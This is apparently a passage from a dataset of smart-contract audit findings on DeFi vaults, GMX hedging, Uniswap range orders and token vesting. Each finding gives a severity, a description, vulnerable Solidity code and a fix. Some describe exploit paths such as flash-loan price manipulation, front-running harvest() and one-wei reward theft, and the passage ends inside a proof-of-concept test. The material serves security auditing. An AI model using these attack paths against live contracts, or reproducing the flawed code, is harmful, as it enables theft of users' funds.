verify withdrawal amount is satisfactory.чч```\\n if (withdrawalValue < lpParams.minDepositWithdraw && \\n amountLiquidityToken < lpParams.minDepositWithdraw) {\\n revert MinimumWithdrawNotMet(address(this), withdrawalValue, lpParams.minDepositWithdraw);\\n }\\n```\\n -base to quote swaps trust GMX-provided minPrice and maxPrice to be correct, which may be manipulatedчmediumчexchangeFromExactBase() in GMXAdapter converts an amount of base to quote. It implements slippage protection by using the GMX vault's getMinPrice() and getMaxPrice() utilities. However, such protection is insufficient because GMX prices may be manipulated. Indeed, GMX supports “AMM pricing” mode where quotes are calculated from Uniswap reserves. A possible attack would be to drive up the base token (e.g. ETH) price, sell a large ETH amount to the GMXAdapter, and repay the flashloan used for manipulation. exchangeFromExactBase() is attacker-reachable from LiquidityPool's exchangeBase().\\n```\\n uint tokenInPrice = _getMinPrice(address(baseAsset));\\n uint tokenOutPrice = _getMaxPrice(address(quoteAsset));\\n // rest of code\\n uint minOut = tokenInPrice\\n .multiplyDecimal(marketPricingParams[_optionMarket].minReturnPercent)\\n .multiplyDecimal(_amountBase)\\n .divideDecimal(tokenOutPrice);\\n```\\nчVerify `getMinPrice()`, `getMinPrice()` outputs are close to Chainlink-provided prices as done in `getSpotPriceForMarket()`.чч```\\n uint tokenInPrice = _getMinPrice(address(baseAsset));\\n uint tokenOutPrice = _getMaxPrice(address(quoteAsset));\\n // rest of code\\n uint minOut = tokenInPrice\\n .multiplyDecimal(marketPricingParams[_optionMarket].minReturnPercent)\\n .multiplyDecimal(_amountBase)\\n .divideDecimal(tokenOutPrice);\\n```\\n -recoverFunds() does not handle popular ERC20 tokens like BNBчmediumчrecoverFunds() is used for recovery in case of mistakenly-sent tokens. However, it uses unsafe transfer to send tokens back, which will not support 100s of non-compatible ERC20 tokens. Therefore it is likely unsupported tokens will be unrecoverable.\\n```\\n if (token == quoteAsset || token == baseAsset || token == weth) {\\n revert CannotRecoverRestrictedToken(address(this));\\n }\\n token.transfer(recipient, token.balanceOf(address(this)));\\n```\\nчUse Open Zeppelin's SafeERC20 encapsulation of ERC20 transfer functions.чч```\\n if (token == quoteAsset || token == baseAsset || token == weth) {\\n revert CannotRecoverRestrictedToken(address(this));\\n }\\n token.transfer(recipient, token.balanceOf(address(this)));\\n```\\n -setPositionRouter leaks approval to previous positionRouterчlowчpositionRouter is used to change GMX positions in GMXFuturesPoolHedger. It can be replaced by a new router if GMX redeploys, for example if a bug is found or the previous one is hacked. The new positionRouter receives approval from the contract. However, approval to the previous positionRouter is not revoked.\\n```\\n function setPositionRouter(IPositionRouter _positionRouter) external onlyOwner {\\n positionRouter = _positionRouter;\\n router.approvePlugin(address(positionRouter));\\n emit PositionRouterSet(_positionRouter);\\n }\\n```\\n\\nA number of unlikely, yet dire scenarios could occur.чUse router.denyPlugin() to remove privileges from the previous positionRouter.чч```\\n function setPositionRouter(IPositionRouter _positionRouter) external onlyOwner {\\n positionRouter = _positionRouter;\\n router.approvePlugin(address(positionRouter));\\n emit PositionRouterSet(_positionRouter);\\n }\\n```\\n -PoolHedger can receive ETH directly from anyoneчlowчA `receive()` function has been added to GMXFuturesPoolHedger, so that it is able to receive ETH from GMX as request refunds. However, it is not advisable to have an open `receive()` function if it is not necessary. Users may wrongly send ETH directly to PoolHedger and lose it forever.\\n```\\n receive() external payable {}\\n```\\nчAdd a msg.sender check in the receive() function, and make sure sender is positionRouter.чч```\\n receive() external payable {}\\n```\\n -Attacker can freeze profit withdrawals from V3 vaultsчhighчUsers of Ninja can use Vault's `withdrawProfit()` to withdraw profits. It starts with the following check:\\n```\\n if (block.timestamp <= lastProfitTime) {\\n revert NYProfitTakingVault__ProfitTimeOutOfBounds();\\n }\\n```\\n\\nIf attacker can front-run user's `withdrawProfit()` TX and set lastProfitTime to block.timestamp, they would effectively freeze the user's yield. That is indeed possible using the Vault paired strategy's `harvest()` function. It is permissionless and calls `_harvestCore()`. The attack path is shown in bold.\\n```\\n function harvest() external override whenNotPaused returns (uint256 callerFee) {\\n require(lastHarvestTimestamp != block.timestamp);\\n uint256 harvestSeconds = lastHarvestTimestamp > 0 ? block.timestamp \\n - lastHarvestTimestamp : 0;\\n lastHarvestTimestamp = block.timestamp;\\n uint256 sentToVault;\\n uint256 underlyingTokenCount;\\n (callerFee, underlyingTokenCount, sentToVault) = _harvestCore();\\n emit StrategyHarvest(msg.sender, underlyingTokenCount, \\n harvestSeconds, sentToVault);\\n }\\n```\\n\\n```\\n function _harvestCore() internal override returns (uint256 callerFee, uint256 underlyingTokenCount, uint256 sentToVault)\\n {\\n IMasterChef(SPOOKY_SWAP_FARM_V2).deposit(POOL_ID, 0);\\n _swapFarmEmissionTokens();\\n callerFee = _chargeFees();\\n underlyingTokenCount = balanceOf();\\n sentToVault = _sendYieldToVault();\\n } \\n```\\n\\n```\\n function _sendYieldToVault() internal returns (uint256 sentToVault) {\\n sentToVault = IERC20Upgradeable(USDC).balanceOf(address(this));\\n if (sentToVault > 0) {\\n IERC20Upgradeable(USDC).approve(vault, sentToVault);\\n IVault(vault).depositProfitTokenForUsers(sentToVault);\\n }\\n }\\n```\\n\\n```\\n function depositProfitTokenForUsers(uint256 _amount) external nonReentrant {\\n if (_amount == 0) {\\n revert NYProfitTakingVault__ZeroAmount();\\n }\\n if (block.timestamp <= lastProfitTime) {\\n revert NYProfitTakingVault__ProfitTimeOutOfBounds();\\n }\\n if (msg.sender != strategy) {\\n revert NYProfitTakingVault__OnlyStrategy();\\n }\\n uint256 totalShares = totalSupply();\\n if (totalShares == 0) {\\n lastProfitTime = block.timestamp;\\n return;\\n }\\n accProfitTokenPerShare += ((_amount * PROFIT_TOKEN_PER_SHARE_PRECISION) / totalShares);\\n lastProfitTime = block.timestamp;\\n // Now pull in the tokens (Should have permission)\\n // We only want to pull the tokens with accounting\\n profitToken.transferFrom(strategy, address(this), _amount);\\n emit ProfitReceivedFromStrategy(_amount);\\n }\\n```\\nчDo not prevent profit withdrawals during lastProfitTime block.чч```\\n if (block.timestamp <= lastProfitTime) {\\n revert NYProfitTakingVault__ProfitTimeOutOfBounds();\\n }\\n```\\n -Lack of child rewarder reserves could lead to freeze of fundsчhighчIn ComplexRewarder.sol, `onReward()` is used to distribute rewards for previous time period, using the complex rewarder and any child rewarders. If the complex rewarder does not have enough tokens to hand out the reward, it correctly stores the rewards owed in storage. However, child rewarded will attempt to hand out the reward and may revert:\\n```\\n function onReward(uint _pid, address _user, address _to, uint, uint _amt) external override onlyParent nonReentrant {\\n PoolInfo memory pool = updatePool(_pid);\\n if (pool.lastRewardTime == 0) return;\\n UserInfo storage user = userInfo[_pid][_user];\\n uint pending;\\n if (user.amount > 0) {\\n pending = ((user.amount * pool.accRewardPerShare) / ACC_TOKEN_PRECISION) - user.rewardDebt;\\n rewardToken.safeTransfer(_to, pending);\\n }\\n user.amount = _amt;\\n user.rewardDebt = (_amt * pool.accRewardPerShare) / \\n ACC_TOKEN_PRECISION;\\n emit LogOnReward(_user, _pid, pending, _to);\\n }\\n```\\n\\nImportantly, if the child rewarder fails, the parent's `onReward()` reverts too:\\n```\\n uint len = childrenRewarders.length();\\n for (uint i = 0; i < len; ) {\\n IRewarder(childrenRewarders.at(i)).onReward(_pid, _user, _to, 0, \\n _amt);\\n unchecked {\\n ++i;\\n }\\n }\\n```\\n\\nIn the worst-case scenario, this will lead the user's `withdraw()` call to V3 Vault, to revert.чIntroduce sufficient exception handling in the CompexRewarder.sol contract, so that `onReward()` would never fail.чч```\\n function onReward(uint _pid, address _user, address _to, uint, uint _amt) external override onlyParent nonReentrant {\\n PoolInfo memory pool = updatePool(_pid);\\n if (pool.lastRewardTime == 0) return;\\n UserInfo storage user = userInfo[_pid][_user];\\n uint pending;\\n if (user.amount > 0) {\\n pending = ((user.amount * pool.accRewardPerShare) / ACC_TOKEN_PRECISION) - user.rewardDebt;\\n rewardToken.safeTransfer(_to, pending);\\n }\\n user.amount = _amt;\\n user.rewardDebt = (_amt * pool.accRewardPerShare) / \\n ACC_TOKEN_PRECISION;\\n emit LogOnReward(_user, _pid, pending, _to);\\n }\\n```\\n -Wrong accounting of user's holdings allows theft of rewardчhighчIn `deposit()`, `withdraw()` and `withdrawProfit()`, `rewarder.onReward()` is called for reward bookkeeping. It will transfer previous eligible rewards and update the current amount user has:\\n```\\n user.amount = _amt;\\n user.rewardDebt = (_amt * pool.accRewardPerShare) / ACC_TOKEN_PRECISION;\\n user.rewardsOwed = rewardsOwed;\\n```\\n\\nIn `withdraw()`, there is a critical issue where `onReward()` is called too early:\\n```\\n // Update rewarder for this user\\n if (address(rewarder) != address(0)) {\\n rewarder.onReward(0, msg.sender, msg.sender, pending, user.amount);\\n }\\n // Burn baby burn\\n _burn(msg.sender, _shares);\\n // User accounting\\n uint256 userAmount = balanceOf(msg.sender);\\n // - Underlying (Frontend ONLY)\\n if (userAmount == 0) {\\n user.amount = 0;\\n } else {\\n user.amount -= r;\\n }\\n```\\n\\nThe new _amt which will be stored in reward contract's user.amount is vault's user.amount, before decrementing the withdrawn amount. Therefore, the withdrawn amount is still gaining rewards even though it's no longer in the contract. Effectively it is stealing the rewards of others, leading to reward insolvency. In order to exploit this flaw, attacker will deposit a larger amount and immediately withdraw it, except for one wei. When they would like to receive the rewards accrued for others, they will withdraw the remaining wei, which will trigger `onReward()`, which will calculate and send pending awards for the previously withdrawn amount.чMove the `onReward()` call to after user.amount is updated.чч```\\n user.amount = _amt;\\n user.rewardDebt = (_amt * pool.accRewardPerShare) / ACC_TOKEN_PRECISION;\\n user.rewardsOwed = rewardsOwed;\\n```\\n -Unsafe transferFrom breaks compatibility with 100s of ERC20 tokensчmediumчIn Ninja vaults, the delegated strategy sends profit tokens to the vault using `depositProfitTokenForUsers()`. The vault transfers the tokens in using:\\n```\\n // Now pull in the tokens (Should have permission)\\n // We only want to pull the tokens with accounting\\n profitToken.transferFrom(strategy, address(this), _amount);\\n emit ProfitReceivedFromStrategy(_amount);\\n```\\n\\nThe issue is that the code doesn't use the `safeTransferFrom()` utility from SafeERC20. Therefore, profitTokens that don't return a bool in `transferFrom()` will cause a revert which means they are stuck in the strategy. Examples of such tokens are USDT, BNB, among hundreds of other tokens.чUse `safeTransferFrom()` from SafeERC20.solчч```\\n // Now pull in the tokens (Should have permission)\\n // We only want to pull the tokens with accounting\\n profitToken.transferFrom(strategy, address(this), _amount);\\n emit ProfitReceivedFromStrategy(_amount);\\n```\\n -Attacker can force partial withdrawals to failчmediumчIn Ninja vaults, users call `withdraw()` to take back their deposited tokens. There is bookkeeping on remaining amount:\\n```\\n uint256 userAmount = balanceOf(msg.sender);\\n // - Underlying (Frontend ONLY)\\n if (userAmount == 0) {\\n user.amount = 0;\\n } else {\\n user.amount -= r;\\n }\\n```\\n\\nIf the withdraw is partial (some tokens are left), user.amount is decremented by r.\\n```\\n uint256 r = (balance() * _shares) / totalSupply();\\n```\\n\\nAbove, r is calculated as the relative share of the user's _shares of the total balance kept in the vault.\\nWe can see that user.amount is incremented in deposit().\\n```\\n function deposit(uint256 _amount) public nonReentrant {\\n …\\n user.amount += _amount;\\n …\\n }\\n```\\n\\nThe issue is that the calculated r can be more than _amount , causing an overflow in `withdraw()` and freezing the withdrawal. All attacker needs to do is send a tiny amount of underlying token directly to the contract, to make the shares go out of sync.чRedesign user structure, taking into account that balance of underlying can be externally manipulatedчч```\\n uint256 userAmount = balanceOf(msg.sender);\\n // - Underlying (Frontend ONLY)\\n if (userAmount == 0) {\\n user.amount = 0;\\n } else {\\n user.amount -= r;\\n }\\n```\\n -Rewards may be stuck due to unchangeable slippage parameterчmediumчIn NyPtvFantomWftmBooSpookyV2StrategyToUsdc.sol, MAX_SLIPPAGE is used to limit slippage in trades of BOO tokens to USDC, for yield:\\n```\\n function _swapFarmEmissionTokens() internal { IERC20Upgradeable boo = IERC20Upgradeable(BOO);\\n uint256 booBalance = boo.balanceOf(address(this));\\n if (booToUsdcPath.length < 2 || booBalance == 0) {\\n return;\\n }\\n boo.safeIncreaseAllowance(SPOOKY_ROUTER, booBalance);\\n uint256[] memory amounts = \\n IUniswapV2Router02(SPOOKY_ROUTER).getAmountsOut(booBalance, booToUsdcPath);\\n uint256 amountOutMin = (amounts[amounts.length - 1] * MAX_SLIPPAGE) / PERCENT_DIVISOR;\\n IUniswapV2Router02(SPOOKY_ROUTER).swapExactTokensForTokensSupportingFeeOnTransferTokens( booBalance, amountOutMin, booToUsdcPath, address(this), block.timestamp );\\n }\\n```\\n\\nIf slippage is not satisfied the entire transaction reverts. Since MAX_SLIPPAGE is constant, it is possible that harvesting of the strategy will be stuck, due to operations leading to too high of a slippage. For example, strategy might accumulate a large amount of BOO, or `harvest()` can be sandwich-attacked.чAllow admin to set slippage after some timelock period.чч```\\n function _swapFarmEmissionTokens() internal { IERC20Upgradeable boo = IERC20Upgradeable(BOO);\\n uint256 booBalance = boo.balanceOf(address(this));\\n if (booToUsdcPath.length < 2 || booBalance == 0) {\\n return;\\n }\\n boo.safeIncreaseAllowance(SPOOKY_ROUTER, booBalance);\\n uint256[] memory amounts = \\n IUniswapV2Router02(SPOOKY_ROUTER).getAmountsOut(booBalance, booToUsdcPath);\\n uint256 amountOutMin = (amounts[amounts.length - 1] * MAX_SLIPPAGE) / PERCENT_DIVISOR;\\n IUniswapV2Router02(SPOOKY_ROUTER).swapExactTokensForTokensSupportingFeeOnTransferTokens( booBalance, amountOutMin, booToUsdcPath, address(this), block.timestamp );\\n }\\n```\\n -potential overflow in reward accumulator may freeze functionalityчmediumчNote the above description of `updatePool()` functionality. We can see that accRewardPerShare is only allocated 128 bits in PoolInfo:\\n```\\n struct PoolInfo {\\n uint128 accRewardPerShare;\\n uint64 lastRewardTime;\\n uint64 allocPoint;\\n```\\n\\nTherefore, even if truncation issues do not occur, it is likely that continuous incrementation of the counter would cause accRewardPerShare to overflow, which would freeze vault functionalities such as withdrawal.чSteal 32 bits from lastRewardTime and 32 bits from allocPoint to make the accumulator have 192 bits, which should be enough for safe calculations.чч```\\n struct PoolInfo {\\n uint128 accRewardPerShare;\\n uint64 lastRewardTime;\\n uint64 allocPoint;\\n```\\n -when using fee-on-transfer tokens in VaultV3, capacity is limited below underlyingCapчlowчVault V3 documentation states it accounts properly for fee-on-transfer tokens. It calculates actual transferred amount as below:\\n```\\n uint256 _pool = balance();\\n if (_pool + _amount > underlyingCap) {\\n revert NYProfitTakingVault__UnderlyingCapReached(underlyingCap);\\n }\\n uint256 _before = underlying.balanceOf(address(this));\\n underlying.safeTransferFrom(msg.sender, address(this), _amount);\\n uint256 _after = underlying.balanceOf(address(this));\\n _amount = _after - _before;\\n```\\n\\nA small issue is that underlyingCap is compared to the _amount before correction for actual transferred amount. Therefore, it cannot actually be reached, and limits the maximum capacity of the vault to underlyingCap minus a factor of the fee %.чMove the underlyingCap check to below the effective _amount calculationчч```\\n uint256 _pool = balance();\\n if (_pool + _amount > underlyingCap) {\\n revert NYProfitTakingVault__UnderlyingCapReached(underlyingCap);\\n }\\n uint256 _before = underlying.balanceOf(address(this));\\n underlying.safeTransferFrom(msg.sender, address(this), _amount);\\n uint256 _after = underlying.balanceOf(address(this));\\n _amount = _after - _before;\\n```\\n -Redundant checks in Vault V3чlowч`depositProfitTokenForUsers()` and `withdrawProfit()` contain the following check:\\n```\\n if (block.timestamp <= lastProfitTime) {\\n revert NYProfitTakingVault__ProfitTimeOutOfBounds();\\n }\\n```\\n\\nHowever, lastProfitTime is only ever set to block.timestamp. Therefore, it can never be larger than block.timestamp.чIt would be best in terms of gas costs and logical clarity to change the comparison to !=чч```\\n if (block.timestamp <= lastProfitTime) {\\n revert NYProfitTakingVault__ProfitTimeOutOfBounds();\\n }\\n```\\n -createUniswapRangeOrder() charges manager instead of poolчhighч_createUniswapRangeOrder() can be called either from manager flow, with createUniswapRangeOrder(), or pool-induced from hedgeDelta(). The issue is that the function assumes the sender is the parentLiquidityPool, for example:\\n```\\n if (inversed && balance < amountDesired) {\\n // collat = 0\\n uint256 transferAmount = amountDesired - balance;\\n uint256 parentPoolBalance = \\n ILiquidityPool(parentLiquidityPool).getBalance(address(token0));\\n if (parentPoolBalance < transferAmount) { revert \\n CustomErrors.WithdrawExceedsLiquidity(); \\n }\\n SafeTransferLib.safeTransferFrom(address(token0), msg.sender, \\n address(this), transferAmount);\\n } \\n```\\n\\nBalance check is done on pool, but money is transferred from sender. It will cause the order to use manager's funds.\\n```\\n function createUniswapRangeOrder(\\n RangeOrderParams calldata params,\\n uint256 amountDesired\\n ) external {\\n require(!_inActivePosition(), \"RangeOrder: active position\");\\n _onlyManager();\\n bool inversed = collateralAsset == address(token0);\\n _createUniswapRangeOrder(params, amountDesired, inversed);\\n }\\n```\\nчEnsure safeTransfer from uses parentLiquidityPool as source.чч```\\n if (inversed && balance < amountDesired) {\\n // collat = 0\\n uint256 transferAmount = amountDesired - balance;\\n uint256 parentPoolBalance = \\n ILiquidityPool(parentLiquidityPool).getBalance(address(token0));\\n if (parentPoolBalance < transferAmount) { revert \\n CustomErrors.WithdrawExceedsLiquidity(); \\n }\\n SafeTransferLib.safeTransferFrom(address(token0), msg.sender, \\n address(this), transferAmount);\\n } \\n```\\n -hedgeDelta() priceToUse is calculated wrong, which causes bad hedgesчhighчWhen _delta parameter is negative for `hedgeDelta()`, priceToUse will be the minimum between quotePrice and underlyingPrice.\\n```\\n // buy wETH\\n // lowest price is best price when buying\\n uint256 priceToUse = quotePrice < underlyingPrice ? quotePrice : \\n underlyingPrice;\\n RangeOrderDirection direction = inversed ? RangeOrderDirection.ABOVE \\n : RangeOrderDirection.BELOW;\\n RangeOrderParams memory rangeOrder = \\n _getTicksAndMeanPriceFromWei(priceToUse, direction);\\n```\\n\\nThis works fine when direction is BELOW, because the calculated lowerTick and upperTick from _getTicksAndMeanPriceFromWei are guaranteed to be lower than current price.\\n```\\n int24 lowerTick = direction == RangeOrderDirection.ABOVE ? \\n nearestTick + tickSpacing : nearestTick - (2 * tickSpacing);\\n int24 tickUpper = direction ==RangeOrderDirection.ABOVE ? lowerTick + \\n tickSpacing : nearestTick - tickSpacing;\\n```\\n\\nTherefore, the fulfill condition is not true and we mint from the correct base. However, when direction is ABOVE, it is possible that the oracle supplied price (underlyingPrice) is low enough in comparison to pool price, that the fulfill condition is already active. In that case, the contract tries to mint from the wrong asset which will cause the wrong tokens to be sent in. In effect, the contract is not hedging. A similar situation occurs when _delta parameter is greater than zero.чVerify the calculated priceToUse is on the same side as pool-calculated tick price.чч```\\n // buy wETH\\n // lowest price is best price when buying\\n uint256 priceToUse = quotePrice < underlyingPrice ? quotePrice : \\n underlyingPrice;\\n RangeOrderDirection direction = inversed ? RangeOrderDirection.ABOVE \\n : RangeOrderDirection.BELOW;\\n RangeOrderParams memory rangeOrder = \\n _getTicksAndMeanPriceFromWei(priceToUse, direction);\\n```\\n -multiplication overflow in getPoolPrice() likelyчmediumч`getPoolPrice()` is used in hedgeDelta to get the price directly from Uniswap v3 pool:\\n```\\n function getPoolPrice() public view returns (uint256 price, uint256 \\n inversed){\\n (uint160 sqrtPriceX96, , , , , , ) = pool.slot0();\\n uint256 p = uint256(sqrtPriceX96) * uint256(sqrtPriceX96) * (10 \\n ** token0.decimals());\\n // token0/token1 in 1e18 format\\n price = p / (2 ** 192);\\n inversed = 1e36 / price;\\n }\\n```\\n\\nThe issue is that calculation of p is likely to overflow. sqrtPriceX96 has 96 bits for decimals, 10** `token0.decimals()` will have 60 bits when decimals is 18, therefore there is only (256 - 2 * 96 - 60) / 2 = 2 bits for non-decimal part of sqrtPriceX96.чConsider converting the sqrtPrice to a 60x18 format and performing arithmetic operations using the PRBMathUD60x18 library.чч```\\n function getPoolPrice() public view returns (uint256 price, uint256 \\n inversed){\\n (uint160 sqrtPriceX96, , , , , , ) = pool.slot0();\\n uint256 p = uint256(sqrtPriceX96) * uint256(sqrtPriceX96) * (10 \\n ** token0.decimals());\\n // token0/token1 in 1e18 format\\n price = p / (2 ** 192);\\n inversed = 1e36 / price;\\n }\\n```\\n -Hedging won't work if token1.decimals() < token0.decimals()чmediumч`tickToToken0PriceInverted()` performs some arithmetic calculations. It's called by `_getTicksAndMeanPriceFromWei()`, which is called by `hedgeDelta()`. This line can overflow:\\n```\\n uint256 intermediate = inWei.div(10**(token1.decimals() -\\n token0.decimals()));\\n```\\n\\nAlso, this line would revert even if the above calculation was done correctly:\\n```\\n meanPrice = OptionsCompute.convertFromDecimals(meanPrice, \\n token0.decimals(), token1.decimals());\\n```\\n\\n```\\n function convertFromDecimals(uint256 value, uint8 decimalsA, uint8 decimalsB) internal pure\\n returns (uint256) {\\n if (decimalsA > decimalsB) {\\n revert();\\n }\\n …\\n```\\n\\nThe impact is that when `token1.decimals()` < `token0.decimals()`, the contract's main function is unusable.чRefactor the calculation to support different decimals combinations. Additionally, add more comprehensive tests to detect similar issues in the future.чч```\\n uint256 intermediate = inWei.div(10**(token1.decimals() -\\n token0.decimals()));\\n```\\n -Overflow danger in _sqrtPriceX96ToUintчmediumч_sqrtPriceX96ToUint will only work when the non-fractional component of sqrtPriceX96 takes up to 32 bits. This represents a price ratio of 18446744073709551616. With different token digits it is not unlikely that this ratio will be crossed which will make hedgeDelta() revert.\\n```\\n function _sqrtPriceX96ToUint(uint160 sqrtPriceX96) private pure returns (uint256)\\n {\\n uint256 numerator1 = uint256(sqrtPriceX96) * \\n uint256(sqrtPriceX96);\\n return FullMath.mulDiv(numerator1, 1, 1 << 192);\\n }\\n```\\nчPerform the multiplication after converting the numbers to 60x18 variablesчч```\\n function _sqrtPriceX96ToUint(uint160 sqrtPriceX96) private pure returns (uint256)\\n {\\n uint256 numerator1 = uint256(sqrtPriceX96) * \\n uint256(sqrtPriceX96);\\n return FullMath.mulDiv(numerator1, 1, 1 << 192);\\n }\\n```\\n -Insufficient dust checksчlowчIn `hedgeDelta()`, there is a dust check in the case of sell wETH order:\\n```\\n // sell wETH\\n uint256 wethBalance = inversed ? amount1Current : amount0Current;\\n if (wethBalance < minAmount) return 0;\\n```\\n\\nHowever, the actual used amount is _delta\\n```\\n uint256 deltaToUse = _delta > int256(wethBalance) ? wethBalance : \\n uint256(_delta);\\n _createUniswapRangeOrder(rangeOrder, deltaToUse, inversed);\\n```\\n\\nThe check should be applied on deltaToUse rather than wethBalance because it will be the minimum of wethBalance and _delta. Additionally, there is no corresponding check for minting with collateral in case _delta is negative.чCorrect current dust checks and add them also in the if clause.чч```\\n // sell wETH\\n uint256 wethBalance = inversed ? amount1Current : amount0Current;\\n if (wethBalance < minAmount) return 0;\\n```\\n -Linear vesting users may not receive vested amountчhighчTokenTransmuter supports two types of transmutations, linear and instant. In linear, allocated amount is released across time until fully vested, while in instant the entire amount is released immediately. transmuteLinear() checks that there is enough output tokens left in the contract before accepting transfer of input tokens.\\n```\\n require(IERC20(outputTokenAddress).balanceOf(address(this)) >= \\n (totalAllocatedOutputToken - totalReleasedOutputToken), \\n \"INSUFFICIENT_OUTPUT_TOKEN\");\\n IERC20(inputTokenAddress).transferFrom(msg.sender, address(0), \\n _inputTokenAmount);\\n```\\n\\nHowever, `transmuteInstant()` lacks any remaining balance checks, and will operate as long as the function has enough output tokens to satisfy the request.\\n```\\n IERC20(inputTokenAddress).transferFrom(msg.sender, address(0), \\n _inputTokenAmount);\\n SafeERC20.safeTransfer(IERC20(outputTokenAddress), msg.sender, \\n allocation);\\n emit OutputTokenInstantReleased(msg.sender, allocation, \\n outputTokenAddress);\\n```\\n\\nAs a result, it is not ensured that tokens that have been reserved for linear distribution will be available when users request to claim them. An attacker may empty the output balance with a large instant transmute and steal future vested tokens of users.чIn transmuteInstant, add a check similar to the one in transmuteLinear. It will ensure allocations are kept faithfully.чч```\\n require(IERC20(outputTokenAddress).balanceOf(address(this)) >= \\n (totalAllocatedOutputToken - totalReleasedOutputToken), \\n \"INSUFFICIENT_OUTPUT_TOKEN\");\\n IERC20(inputTokenAddress).transferFrom(msg.sender, address(0), \\n _inputTokenAmount);\\n```\\n -Multiplier implementation causes limited functionalityчlowчlinearMultiplier and instantMultiplier are used to calculate output token amount from input token amount in transmute functions.\\n```\\n uint256 allocation = (_inputTokenAmount * linearMultiplier) / \\n tokenDecimalDivider;\\n …\\n uint256 allocation = (_inputTokenAmount * instantMultiplier) / \\n tokenDecimalDivider;\\n```\\n\\nThe issue is that they are uint256 variables and can only multiply _inputTokenAmount, not divide it. It results in limited functionality of the protocol as vesting pairs where output tokens are valued more than input tokens cannot be used.чAdd a boolean state variable which will describe whether to multiply or divide by the multiplier.чч```\\n uint256 allocation = (_inputTokenAmount * linearMultiplier) / \\n tokenDecimalDivider;\\n …\\n uint256 allocation = (_inputTokenAmount * instantMultiplier) / \\n tokenDecimalDivider;\\n```\\n -Empty orders do not request from oracle and during settlement they use an invalid oracle version with `price=0` which messes up a lot of fees and funding accounting leading to loss of funds for the makersчhighчWhen `market.update` which doesn't change user's position is called, a new (current) global order is created, but the oracle version is not requested due to empty order. This means that during the order settlement, it will use non-existant invalid oracle version with `price = 0`. This price is then used to accumulate all the data in this invalid `Version`, meaning accounting is done using `price = 0`, which is totally incorrect. For instance, all funding and fees calculations multiply by oracle version's price, thus all time periods between empty order and the next valid oracle version will not accumulate any fees, which is funds usually lost by makers (as makers won't receive fees/funding for the risk they take).\\nWhen `market.update` is called, it requests a new oracle version at the current order's timestamp unless the order is empty:\\n```\\n// request version\\nif (!newOrder.isEmpty()) oracle.request(IMarket(this), account);\\n```\\n\\nThe order is empty when it doesn't modify user position:\\n```\\nfunction isEmpty(Order memory self) internal pure returns (bool) {\\n return pos(self).isZero() && neg(self).isZero();\\n}\\n\\nfunction pos(Order memory self) internal pure returns (UFixed6) {\\n return self.makerPos.add(self.longPos).add(self.shortPos);\\n}\\n\\nfunction neg(Order memory self) internal pure returns (UFixed6) {\\n return self.makerNeg.add(self.longNeg).add(self.shortNeg);\\n}\\n```\\n\\nLater, when a valid oracle version is commited, during the settlement process, oracle version at the position is used:\\n```\\nfunction _processOrderGlobal(\\n Context memory context,\\n SettlementContext memory settlementContext,\\n uint256 newOrderId,\\n Order memory newOrder\\n) private {\\n // @audit no oracle version at this timestamp, thus it's invalid with `price=0`\\n OracleVersion memory oracleVersion = oracle.at(newOrder.timestamp); \\n\\n context.pending.global.sub(newOrder);\\n // @audit order is invalidated (it's already empty anyway), but the `price=0` is still used everywhere\\n if (!oracleVersion.valid) newOrder.invalidate();\\n\\n VersionAccumulationResult memory accumulationResult;\\n (settlementContext.latestVersion, context.global, accumulationResult) = VersionLib.accumulate(\\n settlementContext.latestVersion,\\n context.global,\\n context.latestPosition.global,\\n newOrder,\\n settlementContext.orderOracleVersion,\\n oracleVersion, // @audit <<< when oracleVersion is invalid, the `price=0` will still be used here\\n context.marketParameter,\\n context.riskParameter\\n );\\n// rest of code\\n```\\n\\nIf the oracle version is invalid, the order is invalidated, but the `price=0` is still used to accumulate. It doesn't affect pnl from price move, because the final oracle version is always valid, thus the correct price is used to evaluate all possible account actions, however it does affect accumulated fees and funding:\\n```\\nfunction _accumulateLinearFee(\\n Version memory next,\\n AccumulationContext memory context,\\n VersionAccumulationResult memory result\\n) private pure {\\n (UFixed6 makerLinearFee, UFixed6 makerSubtractiveFee) = _accumulateSubtractiveFee(\\n context.riskParameter.makerFee.linear(\\n Fixed6Lib.from(context.order.makerTotal()),\\n context.toOracleVersion.price.abs() // @audit <<< price == 0 for invalid oracle version\\n ),\\n context.order.makerTotal(),\\n context.order.makerReferral,\\n next.makerLinearFee\\n );\\n// rest of code\\n // Compute long-short funding rate\\n Fixed6 funding = context.global.pAccumulator.accumulate(\\n context.riskParameter.pController,\\n toSkew.unsafeDiv(Fixed6Lib.from(context.riskParameter.takerFee.scale)).min(Fixed6Lib.ONE).max(Fixed6Lib.NEG_ONE),\\n context.fromOracleVersion.timestamp,\\n context.toOracleVersion.timestamp,\\n context.fromPosition.takerSocialized().mul(context.fromOracleVersion.price.abs()) // @audit <<< price == 0 for invalid oracle version\\n );\\n// rest of code\\nfunction _accumulateInterest(\\n Version memory next,\\n AccumulationContext memory context\\n) private pure returns (Fixed6 interestMaker, Fixed6 interestLong, Fixed6 interestShort, UFixed6 interestFee) {\\n // @audit price = 0 and notional = 0 for invalid oracle version\\n UFixed6 notional = context.fromPosition.long.add(context.fromPosition.short).min(context.fromPosition.maker).mul(context.fromOracleVersion.price.abs());\\n// rest of code\\n```\\n\\nAs can be seen, all funding and fees accumulations multiply by oracle version's price (which is 0), thus during these time intervals fees and funding are 0.\\nThis will happen by itself during any period when there are no orders, because oracle provider's settlement callback uses `market.update` with empty order to settle user account, thus any non-empty order is always followed by an empty order for the next version and `price = 0` will be used to settle it until the next non-empty order:\\n```\\nfunction _settle(IMarket market, address account) private {\\n market.update(account, UFixed6Lib.MAX, UFixed6Lib.MAX, UFixed6Lib.MAX, Fixed6Lib.ZERO, false);\\n}\\n```\\n\\nThe scenario above is demonstrated in the test, add this to test/unit/market/Market.test.ts:\\n```\\nit('no fees accumulation due to invalid version with price = 0', async () => {\\n\\nfunction setupOracle(price: string, timestamp : number, nextTimestamp : number) {\\n const oracleVersion = {\\n price: parse6decimal(price),\\n timestamp: timestamp,\\n valid: true,\\n }\\n oracle.at.whenCalledWith(oracleVersion.timestamp).returns(oracleVersion)\\n oracle.status.returns([oracleVersion, nextTimestamp])\\n oracle.request.returns()\\n}\\n\\nfunction setupOracleAt(price: string, valid : boolean, timestamp : number) {\\n const oracleVersion = {\\n price: parse6decimal(price),\\n timestamp: timestamp,\\n valid: valid,\\n }\\n oracle.at.whenCalledWith(oracleVersion.timestamp).returns(oracleVersion)\\n}\\n\\nconst riskParameter = { // rest of code(await market.riskParameter()) }\\nconst riskParameterMakerFee = { // rest of coderiskParameter.makerFee 